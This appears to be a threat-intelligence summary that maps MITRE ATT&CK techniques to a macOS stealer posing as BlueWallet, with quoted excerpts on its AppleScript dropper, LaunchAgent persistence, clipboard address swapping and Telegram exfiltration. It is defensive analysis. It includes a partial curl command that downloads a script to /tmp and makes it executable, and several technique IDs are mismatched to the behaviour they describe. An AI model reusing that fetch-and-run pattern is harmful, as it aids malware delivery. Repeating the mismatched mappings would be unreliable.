Fake BlueWallet steals passwords, accounts, and crypto from Macs

MITRE Techniques

• [T1204.002] User Execution: Malicious File – The victim had to open the downloaded AppleScript and press Run/⌘R for the malware to execute (‘open the installer, then press the play button or ⌘R’ / ‘the victim trusts what they are seeing’).
• [T1059.002] AppleScript – The attack used a malicious AppleScript as the first-stage downloader and execution vehicle (‘The page does something quietly clever… the victim is about to see’ / ‘The AppleScript itself is remarkably short’).
• [T1059.004] Unix Shell – The AppleScript ran a base64-encoded shell command to fetch and execute the payload (‘it runs a single base64-encoded shell command’).
• [T1105] Ingress Tool Transfer – Stage one downloaded the second-stage script from a remote host to /tmp/.sysupd.sh (‘curl -s … -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh’).
• [T1027] Obfuscated Files or Information – The script hid configuration using XOR-decoded values and base64 encoding (‘Its configuration is obfuscated, but weakly’ / ‘base64-encoded shell command’).
• [T1036] Masquerading – The malware disguised itself as a system update file and used BlueWallet branding to appear legitimate (‘the filename .sysupd.sh is dressed up to look like a system update’ / ‘stolen the name and branding’).
• [T1056.001] Keylogging / Input Capture: Keylogging – The malware prompted for the user’s password and validated attempts, capturing the credential (‘asks the user to re-enter their password’).
• [T1115] Clipboard Data – It continuously monitored the clipboard to detect and replace cryptocurrency addresses (‘continuously inspects the clipboard’ / ‘overwrites the clipboard with the attacker’s address via pbcopy’).
• [T1547.001] Boot or Logon Autostart Execution: Launch Agent – Persistence was established by writing a LaunchAgent plist in ~/Library/LaunchAgents (‘It establishes persistence by writing a LaunchAgent plist’).
• [T1053.005] Scheduled Task/Job: Launch Agent – The LaunchAgent was loaded so the implant would run again at every login (‘loading it with launchctl so the implant runs again at every login’).
• [T1074.001] Local Data Staging: Local Data Staging – The malware staged stolen data into archives before exfiltration (‘archives the staged data with macOS’s own ditto’).
• [T1029] Scheduled Transfer – It split larger archives into 49 MB chunks to fit Telegram upload limits (‘it breaks larger archives into 49 MB chunks’).
• [T1567.002] Exfiltration to Cloud Storage – Data was sent through Telegram’s infrastructure, which served as the exfiltration channel (‘The command channel rides Telegram’s Bot API’).
• [T1090.001] Proxy: Internal Proxy – Telegram Bot API was used as an intermediary command channel that helped blend traffic into legitimate HTTPS (‘it is cheap, scalable, encrypted, and blends into ordinary HTTPS traffic’).
• [T1057] Process Discovery – The script checked for presence of cloud/SSH-related files and app data across the system (‘look for credentials and configuration files’).
• [T1005] Data from Local System – It collected browser data, wallet data, notes, and documents from the local machine (‘they pull from six broad categories’).